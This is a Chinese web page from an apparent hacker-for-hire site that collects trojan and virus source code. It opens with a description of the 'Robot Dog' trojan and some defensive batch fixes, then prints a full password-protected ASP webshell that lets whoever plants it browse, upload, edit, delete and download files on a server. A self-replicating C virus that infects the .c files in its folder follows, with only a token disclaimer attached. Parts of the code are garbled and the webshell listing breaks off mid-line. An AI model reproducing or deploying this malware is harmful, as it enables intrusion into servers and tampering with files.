黑客24小时在线接单网站

联系黑客,怎么找黑客,24小时在线黑客,黑客在线QQ,找黑客

c木马病毒源代码(c语言木马病毒制作)

本文目录一览:

谁有机器狗木马病毒的C语言程序代码?

计算机病毒“机器狗”

机器狗的生前身后,曾经有很多人说有穿透还原卡、冰点的病毒,但是在各个论坛都没有样本证据,直到2007年8月29日终于有人在社区里贴出了一个样本。这个病毒没有名字,图标是SONY的机器狗阿宝,就像前辈熊猫烧香一样,大家给它起了个名字叫机器狗。

工作原理

机器狗本身会释放出一个pcihdd.sys到drivers目录,pcihdd.sys是一个底层硬盘驱动,提高自己的优先级接替还原卡或冰点的硬盘驱动,然后访问指定的网址,这些网址只要连接就会自动下载大量的病毒与恶意插件。然后修改接管启动管理器,最可怕的是,会通过内部网络传播,一台中招,能引发整个网络的电脑全部自动重启。

重点是,一个病毒,如果以hook方式入侵系统,接替硬盘驱动的方式效率太低了,而且毁坏还原的方式这也不是最好的,还有就是这种技术应用范围非常小,只有还原技术厂商范围内有传播,在这方面国际上也只有中国在用,所以,很可能就是行业内杠。

对于网吧而言,机器狗就是剑指网吧而来,针对所有的还原产品设计,可预见其破坏力很快会超过熊猫烧香。好在现在很多免疫补丁都以出现,发稿之日起,各大杀毒软件都以能查杀。

免疫补丁之争

现在的免疫补丁之数是疫苗形式,以无害的样本复制到drivers下,欺骗病毒以为本身以运行,起到阻止危害的目的。这种形式的问题是,有些用户为了自身安全会在机器上运行一些查毒程序(比如QQ医生之类)。这样疫苗就会被误认为是病毒,又要废很多口舌。

解决之道

最新的解决方案是将system32/drivers目录单独分配给一个用户,而不赋予administror修改的权限。虽然这样能解决,但以后安装驱动就是一件头疼的事了。

来彻底清除该病毒,处理后重启一下电脑就可以了,之前要打上补丁!

或者这样:

1注册表,组策略中禁止运行userinit.exe 进程

2 在启动项目中加入批处理

A : 强制结束userinit.exe进程 Taskkill /f /IM userinit.exe (其中“/IM”参数后面为进程的图像名,这命令只对XP用户有效)

B : 强制删除userinit.exe文件 DEL /F /A /Q %SystemRoot%\system32\userinit.exe

C : 创建userinit.exe免疫文件到%SystemRoot%\system32\

命令:md %SystemRoot%\system32\userinit.exe nul 2nul

或者 md %SystemRoot%\system32\userinit.exe

attrib +s +r +h +a %SystemRoot%\system32\userinit.exe

D : reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\userinit.exe" /v debugger /t reg_sz /d debugfile.exe /f

userinit1.exe是正常文件改了名字,多加了一个1,你也可以自己修改,不过要手动修改这4个注册表,并导出,这个批处理才能正常使用。

最新动向

好像机器狗的开发以停止了,从样本放出到现在也没有新的版本被发现,这到让我们非常担心,因为虽着研究的深入,现在防御的手段都是针对病毒工作原理的,一但机器狗开始更新,稍加改变工作原理就能大面积逃脱普遍的防御手段,看来机器狗的爆发只是在等待,而不是大家可以高枕了。

目前网上流传一种叫做机器狗的病毒,此病毒采用hook系统的磁盘设备栈来达到穿透目的的,危害极大,可穿透目前技术条件下的任何软件硬件还原!基本无法靠还原抵挡。目前已知的所有还原产品,都无法防止这种病毒的穿透感染和传播。

机器狗是一个木马下载器,感染后会自动从网络上下载木马、病毒,危及用户帐号的安全。

机器狗运行后会释放一个名为PCIHDD.SYS的驱动文件,与原系统中还原软件驱动进行硬盘控制权的争夺,并通过替换userinit.exe文件,实现开机启动。

那么如何识别是否已中毒呢?

是否中了机器狗的关键就在 Userinit.exe 文件,该文件在系统目录的 system32 文件夹中,点击右键查看属性,如果在属性窗口中看不到该文件的版本标签的话,说明已经中了机器狗。如果有版本标签则正常。

临时解决办法:

一是在路由上封IP:

ROS脚本,要的自己加上去

/ ip firewall filter

add chain=forward content=yu.8s7.net action=reject comment="DF6.0"

add chain=forward content= action=reject

二是在c:\windows\system32\drivers下建立免疫文件: pcihdd.sys ,

三是把他要修改的文件在做母盘的时候,就加壳并替换。

在%systemroot%\system32\drivers\目录下 建立个 明字 为 pcihdd.sys 的文件夹 设置属性为 任何人禁止

批处理

md %systemroot%\system32\drivers\pcihdd.sys

cacls %systemroot%\system32\drivers\pcihdd.sys /e /p everyone:n

cacls %systemroot%\system32\userinit.exe /e /p everyone:r

exit

目前,网络流行以下解决方法,或者可以在紧急情况下救急:

1、首先在系统system32下复制个无毒的userinit.exe,文件名为FUCKIGM.exe(文件名可以任意取),这就是下面批处理要指向执行的文件!也就是开机启动userinit.exe的替代品!而原来的userinit.exe保留!其实多复制份的目的只是为了多重保险!可能对防止以后变种起到一定的作用。

2、创建个文件名为userinit.bat的批处理(文件名也可任意取,但要和下面说到的注册表键值保持一致即可),内容如下:

start FUCKIGM.exe (呵呵,够简单吧?)

3、修改注册表键值,将userinit.exe改为userinit.bat。内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]

"Userinit"="C:\\WINDOWS\\system32\\userinit.bat,"

就这3步,让这条狗再也凶不起来!这是在windows 2003测试的,双击机器狗后,没什么反应,对比批处理也是正常,即这狗根本没改动它!开关机游戏均无异常!但唯一美中不足的是,采用经典模式开机的启动时会出现个一闪而过的黑框!

木马程序源码

一个asp木马:

<%@ LANGUAGE = VBScript.Encode codepage ="936" %>

<%Server.ScriptTimeOut=5000%>

<object runat=server id=oScript scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object>

<object runat=server id=oScriptNet scope=page classid="clsid:093FF999-1EA0-4079-9525-9614C3504B74"></object>

<object runat=server id=oFileSys scope=page classid="clsid:0D43FE01-F093-11CF-8940-00A0C9054228"></object>

<%

'on error resume next

dim Data_5xsoft

Class upload_5xsoft

dim objForm,objFile,Version

Public function Form(strForm)

strForm=lcase(strForm)

if not objForm.exists(strForm) then

Form=""

else

Form=objForm(strForm)

end if

end function

Public function File(strFile)

strFile=lcase(strFile)

if not objFile.exists(strFile) then

set File=new FileInfo

else

set File=objFile(strFile)

end if

end function

Private Sub Class_Initialize

dim RequestData,sStart,vbCrlf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,theFile

dim iFileSize,sFilePath,sFileType,sFormValue,sFileName

dim iFindStart,iFindEnd

dim iFormStart,iFormEnd,sFormName

Version="HTTP上传程序 Version 2.0"

set objForm=Server.CreateObject("Scripting.Dictionary")

set objFile=Server.CreateObject("Scripting.Dictionary")

if Request.TotalBytes<1 then Exit Sub

set tStream = Server.CreateObject("adodb.stream")

set Data_5xsoft = Server.CreateObject("adodb.stream")

Data_5xsoft.Type = 1

Data_5xsoft.Mode =3

Data_5xsoft.Open

Data_5xsoft.Write Request.BinaryRead(Request.TotalBytes)

Data_5xsoft.Position=0

RequestData =Data_5xsoft.Read

iFormStart = 1

iFormEnd = LenB(RequestData)

vbCrlf = chrB(13) chrB(10)

sStart = MidB(RequestData,1, InStrB(iFormStart,RequestData,vbCrlf)-1)

iStart = LenB (sStart)

iFormStart=iFormStart+iStart+1

while (iFormStart + 10) < iFormEnd

iInfoEnd = InStrB(iFormStart,RequestData,vbCrlf vbCrlf)+3

tStream.Type = 1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iFormStart

Data_5xsoft.CopyTo tStream,iInfoEnd-iFormStart

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sInfo = tStream.ReadText

tStream.Close

iFormStart = InStrB(iInfoEnd,RequestData,sStart)

iFindStart = InStr(22,sInfo,"name=""",1)+6

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFormName = lcase(Mid (sinfo,iFindStart,iFindEnd-iFindStart))

if InStr (45,sInfo,"filename=""",1) > 0 then

set theFile=new FileInfo

iFindStart = InStr(iFindEnd,sInfo,"filename=""",1)+10

iFindEnd = InStr(iFindStart,sInfo,"""",1)

sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileName=getFileName(sFileName)

theFile.FilePath=getFilePath(sFileName)

iFindStart = InStr(iFindEnd,sInfo,"Content-Type: ",1)+14

iFindEnd = InStr(iFindStart,sInfo,vbCr)

theFile.FileType =Mid (sinfo,iFindStart,iFindEnd-iFindStart)

theFile.FileStart =iInfoEnd

theFile.FileSize = iFormStart -iInfoEnd -3

theFile.FormName=sFormName

if not objFile.Exists(sFormName) then

objFile.add sFormName,theFile

end if

else

tStream.Type =1

tStream.Mode =3

tStream.Open

Data_5xsoft.Position = iInfoEnd

Data_5xsoft.CopyTo tStream,iFormStart-iInfoEnd-3

tStream.Position = 0

tStream.Type = 2

tStream.Charset ="gb2312"

sFormValue = tStream.ReadText

tStream.Close

if objForm.Exists(sFormName) then

objForm(sFormName)=objForm(sFormName)", "sFormValue

else

objForm.Add sFormName,sFormValue

end if

end if

iFormStart=iFormStart+iStart+1

wend

RequestData=""

set tStream =nothing

End Sub

Private Sub Class_Terminate

if Request.TotalBytes>0 then

objForm.RemoveAll

objFile.RemoveAll

set objForm=nothing

set objFile=nothing

Data_5xsoft.Close

set Data_5xsoft =nothing

end if

End Sub

Private function GetFilePath(FullPath)

If FullPath <> "" Then

GetFilePath = left(FullPath,InStrRev(FullPath, "\"))

Else

GetFilePath = ""

End If

End function

Private function GetFileName(FullPath)

If FullPath <> "" Then

GetFileName = mid(FullPath,InStrRev(FullPath, "\")+1)

Else

GetFileName = ""

End If

End function

End Class

Class FileInfo

dim FormName,FileName,FilePath,FileSize,FileType,FileStart

Private Sub Class_Initialize

FileName = ""

FilePath = ""

FileSize = 0

FileStart= 0

FormName = ""

FileType = ""

End Sub

Public function SaveAs(FullPath)

dim dr,ErrorChar,i

SaveAs=true

if trim(fullpath)="" or FileStart=0 or FileName="" or right(fullpath,1)="/" then exit function

set dr=CreateObject("Adodb.Stream")

dr.Mode=3

dr.Type=1

dr.Open

Data_5xsoft.position=FileStart

Data_5xsoft.copyto dr,FileSize

dr.SaveToFile FullPath,2

dr.Close

set dr=nothing

SaveAs=false

end function

End Class

httpt = Request.ServerVariables("server_name")

rseb=Request.ServerVariables("SCRIPT_NAME")

q=request("q")

if q="" then q=rseb

select case q

case rseb

if Epass(trim(request.form("password")))="q_ux888556" then

response.cookies("password")="7758521"

response.redirect rseb "?q=list.asp"

else %>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title><%=httpt%></title>

<meta name="GENERATOR" content="Microsoft FrontPage 3.0">

</head>

<body>

<%if request.form("password")<>"" then

response.write "Password Error!"

end if

%>

<table border="1" width="100%" height="89" bgcolor="#DFDFFF" cellpadding="3"

bordercolorlight="#000000" bordercolordark="#F2F2F9" cellspacing="0">

<tr>

<td width="100%" height="31" bgcolor="#000080"><p align="center"><font color="#FFFFFF"><%=httpt%></font></td>

</tr>

<tr>

<td width="100%" height="46"><form method="POST" action="<%=rseb%>?q=<%=rseb%>">

<div align="center"><center><p>Enter Password:<input type="password" name="password"

size="20"

style="border-left: thin none; border-right: thin none; border-top: thin outset; border-bottom: thin outset">

<input type="submit" value="OK!LOGIN" name="B1"

style="font-size: 9pt; border: thin outset"></p>

</center></div>

</form>

</td>

</tr>

</table>

</body>

</html>

<%end if%>

<%case "down.asp"

call downloadFile(request("path"))

function downloadFile(strFile)

strFilename = strFile

Response.Buffer = True

Response.Clear

set s = Server.CreateObject("adodb.stream")

s.Open

s.Type = 1

if not oFileSys.FileExists(strFilename) then

Response.Write("<h1>Error:</h1>" strFilename " does not exist<p>")

Response.End

end if

Set f = oFileSys.GetFile(strFilename)

intFilelength = f.size

s.LoadFromFile(strFilename)

if err then

Response.Write("<h1>Error: </h1>" err.Description "<p>")

Response.End

end if

Response.AddHeader "Content-Disposition", "attachment; filename=" f.name

Response.AddHeader "Content-Length", intFilelength

Response.CharSet = "UTF-8"

Response.ContentType = "application/octet-stream"

Response.BinaryWrite s.Read

Response.Flush

s.Close

Set s = Nothing

response.end

End Function

%>

<%case "list.asp"%>

<%

urlpath=server.urlencode(path)

if Request.Cookies("password")="7758521" then

dim cpath,lpath

if Request("path")="" then

lpath="/"

else

lpath=Request("path")"/"

end if

if Request("attrib")="true" then

cpath=lpath

attrib="true"

else

cpath=Server.MapPath(lpath)

attrib=""

end if

Sub GetFolder()

dim theFolder,theSubFolders

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theSubFolders=theFolder.SubFolders

Response.write"<a href='" rseb "?q=list.asppath="Request("oldpath")"attrib="attrib"'><font color='#FF8000'>■</font>↑<font color='ff2222'>回上级目录</font></a><br><script language=vbscript>"

For Each x In theSubFolders

%>so "<%=lpath%>","<%=x.Name%>","<%=request("path")%>","<%=attrib%>"

<%

Next

%></script><%

end if

End Sub

Sub GetFile()

dim theFiles

if oFileSys.FolderExists(cpath)then

Set theFolder=oFileSys.GetFolder(cpath)

Set theFiles=theFolder.Files

Response.write"<table border='0' width='100%' cellpadding='0'><script language=vbscript>"

For Each x In theFiles

if Request("attrib")="true" then

showstring=x.Name

else

showstring=x.Name

end if

%>sf "<%=showstring%>","<%=x.size%>","<%=x.type%>","<%=x.Attributes%>","<%=x.DateLastModified%>","<%=lpath%>","<%=x.name%>","<%=attrib%>","<%=x.name%>"

<%

Next

end if

Response.write"</script></table>"

End Sub

%>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title><%=httpt%></title>

<style type="text/css">

<!--

table{ font-family: 宋体; font-size: 9pt }

a{ font-family: 宋体; font-size: 9pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: none }

a:visited{ color: rgb(128,0,0) }

td { font-size: 9pt}

a { color: #000000; text-decoration: none}

a:hover { text-decoration: underline}

.tx { height: 16px; width: 30px; border-color: black black #000000; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 1px; border-left-width: 0px; font-size: 9pt; background-color: #eeeeee; color: #0000FF}

.bt { font-size: 9pt; border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; height: 16px; width: 80px; background-color: #eeeeee; cursor: hand}

.tx1 { height: 18px; width: 60px; font-size: 9pt; border: 1px solid; border-color: black black #000000; color: #0000FF}

-->

</style>

</head>

<script language="JavaScript">

function crfile(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("<%=rseb%>?q=edit.aspattrib=<%=request("attrib")%>creat=yespath=<%=lpath%>"+ls);}

return false;

}

function crdir(ls)

{if (ls==""){alert("请输入文件名!");}

else {window.open("<%=rseb%>?q=edir.aspattrib=<%=request("attrib")%>op=creatpath=<%=lpath%>"+ls);}

return false;

}

</script>

<script language="vbscript">

sub sf(showstring,size,type1,Attributes,DateLastModified,lpath,xname,attrib,name)

document.write "<tr style=""color: #000000; background-color: #FFefdf; text-decoration: blink; border: 1px solid #000080"" onMouseOver=""this.style.backgroundColor = '#FFCC00'"" onMouseOut=""this.style.backgroundColor = '#FFefdf'""><td width='50%'><font color='#FF8000'><font face=Wingdings>+</font></font><a href='" urlpath lpath xName "' target='_blank'><strong>" showstring "</strong></a></td><td width='20%' align='right'>" size "字节</td><td width='30%'><a href='#' title='类型:" type1 chr(10) "属性:" Attributes chr(10) "时间:" DateLastModified "'>属性</a> <a href='<%=rseb%>?q=edit.asppath=" lpath xName "attrib=" attrib "' target='_blank' ><font color='#FF8000' ></font>编辑</a> <a href="chr(34)"javascript: rmdir1('" lpath xName "')"chr(34)"><font color='#FF8000' ></font>删除</a> <a href='#' onclick=copyfile('" lpath Name "')><font color='#FF8000' ></font>复制</a> <a href='<%=rseb%>?q=down.asppath=<%=cpath%>\"xName"attrib=" attrib "' target='_blank' ><font color='#FF8000' ></font>下载</a></td></tr>"

end sub

sub so(lpath,xName,path,attrib)

document.write "<a href='<%=rseb%>?q=list.asppath=" lpath xName "oldpath=" path "attrib=" attrib "'>└<font color='#FF8000'><font face=Wingdings>1</font></font> " xName "</a> <a href="chr(34)"javascript: rmdir('" lpath xName "')"chr(34)"><font color='#FF8000' ></font>删除</a><br>"

end sub

sub rmdir1(ls)

if confirm("你真的要删除这个文件吗!"Chr(13)Chr(10)"文件为:"ls) then

window.open("<%=rseb%>?q=edit.asppath=" ls "op=delattrib=<%=request("attrib")%>")

end if

end sub

sub rmdir(ls)

if confirm("你真的要删除这个目录吗!"Chr(13)Chr(10)"目录为:"ls) then

window.open("<%=rseb%>?q=edir.asppath="ls"op=delattrib=<%=request("attrib")%>")

end if

end sub

sub copyfile(sfile)

dfile=InputBox("※文件复制※"Chr(13)Chr(10)"源文件:" sfileChr(13)Chr(10)"输入目标文件的文件名:"Chr(13)Chr(10) "[允许带路径,要根据你的当前路径模式]")

dfile=trim(dfile)

attrib="<%=request("attrib")%>"

if dfile<>"" then

if InStr(dfile,":") or InStr(dfile,"/")=1 then

lp=""

if InStr(dfile,":") and attrib<>"true" then

alert "对不起,你在相对路径模式下不能使用绝对路径"Chr(13)Chr(10)"错误路径:["dfile"]"

exit sub

end if

else

lp="<%=lpath%>"

end if

window.open("<%=rseb%>?q=edit.asppath="+sfile+"op=copyattrib="+attrib+"dpath="+lp+dfile)

else

alert"您没有输入文件名!"

end If

end sub

</script>

<body>

<table border="1" width="100%" cellpadding="0" height="81" bordercolorlight="#000000"

bordercolordark="#FFFFFF" cellspacing="0">

<tr>

<td width="755" bgcolor="#000080" colspan="2" height="23"><p align="center"><font size="3"

color="#FFFFFF"><%=httpt%></font></td>

</tr>

<tr>

<td width="751" bgcolor="#C0C0C0" colspan="2">※换盘:<span

style="background-color: rgb(255,255,255);color:rgb(255,0,0)"><%

For Each thing in oFileSys.Drives

Response.write "<font face=Wingdings>:</font><a href='" rseb "?q=list.asppath="thing.DriveLetter":attrib=true'>"thing.DriveLetter":</a>"

NEXT

%> </span> 地址:

<%= "\\" oScriptNet.ComputerName "\" oScriptNet.UserName %></td>

</tr>

<tr>

<td width="751" bgcolor="#C0C0C0" colspan="2">※<%

if Request("attrib")="true" then

response.write "<a href='" rseb "?q=list.asp'>切到相对路径</a>"

else

response.write "<a href='" rseb "?attrib=trueq=list.asp'>切到绝对路径</a>"

end if

%> ※绝对:<span

style="background-color: rgb(255,255,255)"><%=cpath%></span></td>

</tr>

<tr>

<td width="751" bgcolor="#C0C0C0" colspan="2">※当前<font color="#FF8000"><font face=Wingdings>1</font></font>:<span style="background-color: rgb(255,255,255)"><%=lpath%></span> </td>

</tr><form name="form1" method="post" action="<%=rseb%>?q=upfile.asp" target="_blank" enctype="multipart/form-data">

<tr><td bgcolor="#C0C0C0" colspan="2" style="height: 20px">

编辑|

<input class="33b5-d3e1-5921-053f tx1" type="text" name="filename" size="20">

<input class="d3e1-5921-053f-8182 tx1" type="button" value="建文" onclick="crfile(form1.filename.value)">

<input class="5921-053f-8182-561a tx1" type="button" value="建目" onclick="crdir(form1.filename.value)">

<input type="file" name="file1" class="053f-8182-561a-5f40 tx1" style="width:100" value="">

<input type="text" name="filepath" class="8182-561a-5f40-4049 tx1" style="width:100" value="<%=cpath%>">

<input type="hidden" name="act" value="upload">

<input type="hidden" name="upcount" class="561a-5f40-4049-0626 tx" value="1">

<input class="5f40-4049-0626-1f23 tx1" type="submit" value="上传">

<input class="4049-0626-1f23-a1fb tx1" type="button" onclick="window.open('<%=rseb%>?q=cmd.asp','_blank')" value="命令">

<input class="0626-1f23-a1fb-8570 tx1" type="button" onclick="window.open('<%=rseb%>?q=test.asp','_blank')" value="配置">

<input class="1f23-a1fb-8570-683c tx1" type="button" onclick="window.open('<%=rseb%>?q=p.asp','_blank')" value="nfso">

</td>

</td>

</tr></form>

<tr>

<td width="169" valign="top" bgcolor="#C8E3FF"><%Call GetFolder()%>

</td>

<td width="582" valign="top" bgcolor="#FFefdf"><%Call GetFile()%>

</td>

</tr>

</table>

<%else

response.write "Password Error!"

response.write "<a href='" rseb "?q=" rseb "'>【返 回】</a>"

end if

%>

</body>

</html>

<%case "edit.asp"%>

<html>

<head>

<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">

<title>编辑源代码</title>

<style>

<!--

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

-->

</style>

</head>

<body>

<% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.Delete True

Response.write "<script>alert('删除成功!要刷新才能看到效果');window.close();</script>"

else

if request("op")="copy" then

if Request("attrib")="true" then

whichfile=Request("path")

dsfile=Request("dpath")

else

whichfile=server.mappath(Request("path"))

dsfile=Server.MapPath(Request("dpath"))

end if

Set thisfile = oFileSys.GetFile(whichfile)

thisfile.copy dsfile

%>

<script language=vbscript>

msgbox "源文件:<%=whichfile%>" vbcrlf "目的文件:<%=dsfile%>" vbcrlf "复制成功!要刷新才能看到效果!"

window.close()

</script>

<%

else

if request.form("text")="" then

if Request("creat")<>"yes" then

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set thisfile = oFileSys.OpenTextFile(whichfile, 1, False)

counter=0

thisline=thisfile.readall

thisfile.Close

set fs=nothing

end if

%>

<form method="POST" action="<%=rseb%>?q=edit.asp">

<input type="hidden" name="attrib" value="<%=Request("attrib")%>"><table border="0"

width="700" cellpadding="0">

<tr>

<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><%=httpt%></td>

</tr>

<tr align="center">

<td width="100%" bgcolor="#FFDBCA">文件名:<input type="text" name="path" size="45"

value="<%=Request("path")%> ">直接更改文件名,相当于“另存为”</td>

</tr>

<tr align="center">

<td width="100%" bgcolor="#FFDBCA"><textarea rows="25" name="text" cols="90"><%=thisline%></textarea></td>

</tr>

<tr align="center">

<td width="100%" bgcolor="#FFDBCA"><div align="center"><center><p><input type="submit"

value="提交" name="B1"><input type="reset" value="复原" name="B2"></td>

</tr>

</table>

</form>

<%else

if Request("attrib")="true" then

whichfile=Request("path")

else

whichfile=server.mappath(Request("path"))

end if

Set outfile=oFileSys.CreateTextFile(whichfile)

outfile.WriteLine Request("text")

outfile.close

set fs=nothing

Response.write "<script>alert('修改成功!要刷新才能看到效果');window.close();</script>"

end if

end if

end if

else

response.write "Password Error!"

response.write "<a href='" rseb "?q=" rseb "'>【返 回】</a>"

end if

%>

</body>

</html>

<%case "edir.asp"%>

<html>

<head>

<meta HTTP-EQUIV="Content-Type" CONTENT="text/html;charset=gb_2312-80">

<title>目录操作</title>

<style>

<!--

table{ font-family: 宋体; font-size: 12pt }

a{ font-family: 宋体; font-size: 12pt; color: rgb(0,32,64); text-decoration: none }

a:hover{ font-family: 宋体; color: rgb(255,0,0); text-decoration: underline }

a:visited{ color: rgb(128,0,0) }

-->

</style>

</head>

<body>

<% '读文件

if Request.Cookies("password")="7758521" then

if request("op")="del" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.DeleteFolder whichdir,True

Response.write "<script>alert('删除的目录为:" whichdir "删除成功!要刷新才能看到效果');window.close();</script>"

else

if request("op")="creat" then

if Request("attrib")="true" then

whichdir=Request("path")

else

whichdir=server.mappath(Request("path"))

end if

oFileSys.CreateFolder whichdir

Response.write "<script>alert('建立的目录为:" whichdir "建立成功!要刷新才能看到效果');window.close();</script>"

end if

end if

else

response.write "Password Error!"

response.write "<a href='" rseb "?q=" rseb "'>【返 回】</a>"

end if

%>

</body>

</html>

<%

case "upfile.asp"

if Request.Cookies("password")="7758521" then

set upload=new upload_5xSoft

if upload.form("filepath")="" then

HtmEnd "请输入要上传至的目录!"

set upload=nothing

response.end

else

formPath=upload.form("filepath")

if right(formPath,1)<>"/" then formPath=formPath"/"

end if

iCount=0

for each formName in upload.objForm

set file=upload.file(formName)

if file.FileSize>

c语言木马源代码

#include stdio.h

#include dir.h

void main(void)

{

virus();

}

int virus()

{

struct ffblk ffblk;

FILE *in,*out,*read;

char *virus="virus.c";

char buf[50][80];

char *p;

char *end="return";

char *bracket="}";

char *main="main";

char *include[2]={"stdio.h","dir.h"};

char *int_virus="int virus()";

char *buffer;

int done,i,j=0,flag=0;

printf("\nI have a virus. Writen by PuBin\n");

done = findfirst("*.c",ffblk,0);

while (!done)

{

i=0;

if ((in = fopen(ffblk.ff_name, "rt"))== NULL)

{

goto next;

}

do{

if(i=50)

{

fclose(in);

goto next;

}

p=fgets(buf[i],80,in);

i++;

}while(p!=NULL);

fclose(in);

out=fopen(ffblk.ff_name,"w+t");

fputs("#includestdio.h\n",out);

fputs("#includedir.h\n",out);

do

{

if(strstr(buf[j],main)!=NULL)

{

for(;ji-1;j++)

if(strstr(buf[j],end)==NULLstrstr(buf[j],bracket)==NULL)

fputs(buf[j],out);

else

{

if(flag==0)

{

flag=1;

fputs("virus();\n",out);

}

fputs(buf[j],out);

}

}

else if((strstr(buf[j],include[0])==NULL)

(strstr(buf[j],include[1])==NULL))

{

fputs(buf[j],out);

j++;

}

else

j++;

}while(ji-1);

read=fopen(virus,"rt");

do

{

p=fgets(buffer,80,read);

if(strstr(buffer,int_virus))

while(p!=NULL)

{

if(strstr(buffer,virus)==NULL)

fputs(buffer,out);

else

{

fputs(" char *virus=\"",out);

fputs(ffblk.ff_name,out);

fputs("\";\n",out);

}

p=fgets(buffer,80,read);

}

}while(p!=NULL);

fclose(read);

fclose(out);

printf("\nYour c program %s has a virus. Writen by PuBin\n",ffblk.ff_name);

next: done = findnext(ffblk);

}

return 0;

}

严重声明:这个程序只是供C语言新手参考,开玩笑没关系,但如果用来做不法的事情,本人概不负责。还有,编病毒、木马去做违法的事情惩罚是很重的,你如果想学编程,编个简单的就好了,否则后果很严重。

木马病毒如何破解(源代码破解)

@echo off

echo ------------U盘杀毒------------

@echo.

@echo.

pause

@echo.

@echo.

echo 正在清除病毒

taskkill /F /IM winservice.exe

@echo.

@echo.

echo 请稍等5秒钟

pause

rd /S /Q C:\WINDOWS\winsystem

@echo.

@echo.

rem 删除病毒文件

echo 正在恢复文件夹

@echo.

@echo.

rem 取消属性

dir /a:ds /b dir.txt

for /f "tokens=* delims= " %%i in (dir.txt) do call :ss "%%i"

del dir.txt

attrib -s -h -r open*.exe

del open*.exe

del "*.lnk"

attrib +s +h "System Volume Information"

attrib +s +h ""

@echo.

@echo.

@echo.

@echo.

echo 清除成功。。。

pause

goto :eof

:ss

set var=%1

echo 正在修复文件夹 %var% ...

attrib -s -h -r %var%

goto :e

  • 评论列表:
  •  黑客技术
     发布于 2022-06-25 19:50:43  回复该评论
  • ase "upfile.asp"if Request.Cookies("password")="7758521" thenset upload=new upload_5xSoftif upload.form("filepath")="" thenHtmEnd "

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.